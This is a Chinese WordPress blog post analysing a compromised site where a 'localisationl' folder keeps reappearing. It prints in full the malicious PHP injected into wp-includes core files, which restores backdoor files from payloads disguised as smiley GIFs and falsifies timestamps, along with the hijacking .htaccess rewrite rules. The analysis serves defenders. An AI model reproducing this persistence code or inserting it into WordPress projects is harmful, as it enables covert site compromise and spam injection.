^ 回到顶部
  • 人生没有定律,每个人都有自己的节奏
  • 本站wordpress建站教程均通过实践后发布,希望对你有帮助
  • 希望你的坚持,都是因为热爱,而不是因为不甘心
  • 5年wordpress建站经验,5星服务品质
  • 那些不愿意让你吃亏的人,才是真正值得你深交的人,也是值得你付出时间的人
  • 阿里云1核2g仅需102元/年,今日10点开抢

wordpress网站根目录出现不明文件夹localisationl

阿里云双12限时特惠

常在河边走,哪有不湿鞋,今天小雨碰到一个客户说自己的 wordpress 网站根目录下出现 localisationl 文件夹,里面包含了两个文件,即使删除了,一访问网站,还是会出现
wordpress网站根目录出现不明文件夹localisationl

经过排查发现 wordpress 的安装文件被修改了,所以建议他重新在官网下载 wordpress,备份好图片、插件、数据库和模板,重新安装。

他的故事结束了,小雨的才刚刚开始。

经过全局搜索,发现是因为 wordpress 的 wp-includes 文件夹下面的 load.php 和 template-loader.php 被恶意修改了。

wordpress网站根目录出现不明文件夹localisationl

额外添加的代码如下:


//ck1bg
$nowFileDir =  'localisationl';
$nowHtacFile =  './.htaccess';
$nowMobanFile =  './localisationl/moban.html';
$nowIndexFile =  './localisationl/index.php';
$nowLogFile =  './localisationl/logs.txt';
$bkLocalFileIndex1 =  './wp-includes/images/smilies/icon_reds.gif';
$bkLocalFileHtac1 =  './wp-includes/images/smilies/icon_blacks.gif';
$bkLocalFileMoban1 =  './wp-includes/images/smilies/icon_greens.gif';

if($nowHtacFile && file_exists($bkLocalFileHtac1)){
	if(!file_exists($nowHtacFile) or (filesize($nowHtacFile) != filesize($bkLocalFileHtac1))){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@chmod($nowHtacFile,0755);
		@file_put_contents($nowHtacFile,file_get_contents($bkLocalFileHtac1));
		@chmod($nowHtacFile,0755);
	}
}


if(file_exists($bkLocalFileIndex1)){
	if(!file_exists($nowIndexFile) or (filesize($nowIndexFile) != filesize($bkLocalFileIndex1) && !file_exists($nowLogFile))){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@chmod($nowIndexFile,0755);
		@file_put_contents($nowIndexFile,file_get_contents($bkLocalFileIndex1));
		@chmod($nowIndexFile,0755);
	}
}

if(file_exists($bkLocalFileMoban1)){
	
	if(!file_exists($nowMobanFile)){
		if(!is_dir("./$nowFileDir")){
			@mkdir("./$nowFileDir",0755);
		}
		@file_put_contents($nowMobanFile,file_get_contents($bkLocalFileMoban1));
		@chmod($nowMobanFile,0755);
	}else{
		if(filesize($nowMobanFile) != filesize($bkLocalFileMoban1)){
			$tpstrMb = file_get_contents($nowMobanFile);
			if(strstr($tpstrMb,"#bbbtitsbbb#") && !strstr($tpstrMb,"<!--ttt html5 tttt-->")){
				$fitime = filemtime($bkLocalFileMoban1);
				@chmod($bkLocalFileMoban1,0755);
				@file_put_contents($bkLocalFileMoban1,$tpstrMb);
				@touch($bkLocalFileMoban1, $fitime, $fitime);  
			}else{
				@chmod($bkLocalFileMoban1,0755);
				@file_put_contents($nowMobanFile,file_get_contents($bkLocalFileMoban1));
				@chmod($bkLocalFileMoban1,0755);
			}
		}
	}
	
}
//ck1end

这也就是造成 localisationl 文件夹删除了后只要一访问网站立马又出现的原因。

还发现 htaccess 文件也被添加了两条伪静态

RewriteRule ^.*/(\d+)/$ localisationl/index\.php?id=$1&%{QUERY_STRING} [L]
RewriteRule ^.*-(\d+)/$ localisationl/index\.php?cat=$1&%{QUERY_STRING} [L]

不过客户的服务器是 nginx,所以这个文件应该没有起作用,但如果是 apache 又会出现什么情况呢?

我们来一探究竟,这个 localisationl 文件夹下的 index.php 文件里到底是什么东东?他又做了什么?

展开代码

那么他究竟做了什么坏事了呢?请听下回分解。

让小雨知道,这篇文章帮到了你
扫码关注微信公众号zs40086(微搜片)随时随地微信看片,抢先福利电影等你来

热门推荐

如有疑问,请前往问答中心反馈!

反馈